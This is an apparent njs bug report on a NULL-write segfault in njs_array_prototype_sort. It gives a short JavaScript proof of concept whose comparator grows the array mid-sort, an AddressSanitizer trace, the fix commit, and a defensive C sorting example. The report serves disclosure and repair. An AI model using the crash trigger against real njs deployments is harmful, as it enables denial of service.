# Key Information

## Vulnerability Title

SEGV in njs_array_prototype_sort

## Vulnerability Status

Closed

## Vulnerability Description

A segmentation fault (SEGV) exists in the array sorting function `njs_array_prototype_sort`. In the PoC below, the comparator passed to `Array.prototype.sort` writes to index `0xffff` of the array that is being sorted; the sort then crashes in a `memcpy` that writes to a NULL address (`src/njs_array.c:2704`, see the stack trace).

## Environment Information

- **Operating System**: Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
- **Commit Version**: `f65981b`
- **NJS Version**: 0.7.3
- **Build Configuration**:
  - `NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"`
  - `NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"`

## Proof of Concept (PoC)

```javascript
function main() {
    var empty = {};
    var arr1 = [empty, empty];

    // Comparator with a side effect on the array being sorted:
    // writing index 0xffff grows arr1 while sort() is still running.
    function func(arg) {
        arr1[0xffff] *= arg;
    }

    var v5 = arr1.sort(func);
}

main();
```

## Stack Trace

```plaintext
AddressSanitizer:DEADLYSIGNAL
==============
==610159==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff6f91b13 bp 0x7fffffffb3d0 sp 0x7fffffffca70 T0)
==610159==The signal is caused by a WRITE memory access.
==610159==Hint: address points to the zero page.
    #0 0x7ffff6f91b12 in mempcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12)
    #1 0x7ffff7688d40 in __asan_memcpy ../../../../src/libsanitizer/asan/asan_interceptors_memintrinsics.cc:2100
    #2 0x5555556042ff in njs_array_prototype_sort src/njs_array.c:2704
    #3 0x55555561961c in njs_function_native_call src/njs_function.c:739
    #4 0x5555555f0f5b in njs_vmcode_interpreter src/njs_vmcode.c:788
    #5 0x555555618aba in njs_function_lambda_call src/njs_function.c:703
    #6 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788
    #7 0x55555555b90a in njs_vm_start src/njs_vm.c:553
    #8 0x5555555a23f8 in njs_process_script src/njs_shell.c:890
    #9 0x5555555a2ebf in njs_process_file src/njs_shell.c:619
    #10 0x5555555a421f in main src/njs_shell.c:303
    #11 0x7ffff6fba0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
    #12 0x55555559fc4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) in mempcpy
==610159==ABORTING
```

## Fix Commit

Fixed in `8b39afd`

## Contributors

- xmzyshypnc (@xmzyshypnc)
- P1umer (@P1umer)
- xeioex (@xeioex)

## Tags

- bug
- fuzzer
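The defensive pattern this crash calls for, as an added illustrative example in C that is neither njs code nor the fix in `8b39afd`: a hypothetical toy array (`toy_array`, `toy_set`) whose user comparator can reallocate the backing store mid-sort, and a `toy_sort` that runs the comparator against a private snapshot and re-reads the array's pointer and length before writing back, so the side effect from the PoC cannot leave the sort holding a stale pointer.

```c
#include <stdlib.h>
#include <string.h>
/* Toy growable array standing in for an engine's array storage (hypothetical, not njs). */
typedef struct { long *elems; size_t length; size_t capacity; } toy_array;
/* Writing past the end reallocates the backing store: the side effect the PoC's
 * arr1[0xffff] *= arg triggers from inside the comparator. */
static int toy_set(toy_array *a, size_t index, long value) {
    if (index >= a->capacity) {
        size_t cap = a->capacity ? a->capacity : 4;
        while (cap <= index) cap *= 2;
        long *p = realloc(a->elems, cap * sizeof *p);
        if (p == NULL) return -1;
        memset(p + a->capacity, 0, (cap - a->capacity) * sizeof *p);
        a->elems = p; a->capacity = cap;
    }
    if (index >= a->length) a->length = index + 1;
    a->elems[index] = value;
    return 0;
}
typedef int (*toy_cmp)(toy_array *self, long x, long y);
/* Hardened sort: the comparator only sees a private snapshot, so nothing it does to the
 * array can invalidate the data; elems and length are re-read before the write-back. */
static int toy_sort(toy_array *a, toy_cmp cmp) {
    size_t n = a->length;
    long *snap = malloc((n ? n : 1) * sizeof *snap);
    if (snap == NULL) return -1;
    memcpy(snap, a->elems, n * sizeof *snap);
    for (size_t i = 1; i < n; i++) {               /* insertion sort on the snapshot */
        long key = snap[i]; size_t j = i;
        while (j > 0 && cmp(a, snap[j - 1], key) > 0) { snap[j] = snap[j - 1]; j--; }
        snap[j] = key;
    }
    if (a->length < n) n = a->length;              /* array may have shrunk meanwhile */
    memcpy(a->elems, snap, n * sizeof *snap);      /* current pointer, clamped length */
    free(snap);
    return 0;
}
/* Comparator with the PoC's side effect: grows the array to 0x10000 elements mid-sort. */
static int growing_cmp(toy_array *self, long x, long y) {
    toy_set(self, 0xffff, 1);
    return (x > y) - (x < y);
}
/* Returns 0 when sorting [3,1,2] survives the mutating comparator, ordered and grown. */
int demo(void) {
    toy_array a = {0};
    toy_set(&a, 0, 3); toy_set(&a, 1, 1); toy_set(&a, 2, 2);
    if (toy_sort(&a, growing_cmp) != 0) return 1;
    int ok = a.length == 0x10000 && a.elems[0] == 1 && a.elems[1] == 2 && a.elems[2] == 3;
    free(a.elems);
    return ok ? 0 : 2;
}
```

Caching `a->elems` before the comparator loop and writing through it afterwards is the stale-pointer pattern that ends in a bad `memcpy`; building the sort around the snapshot removes that window.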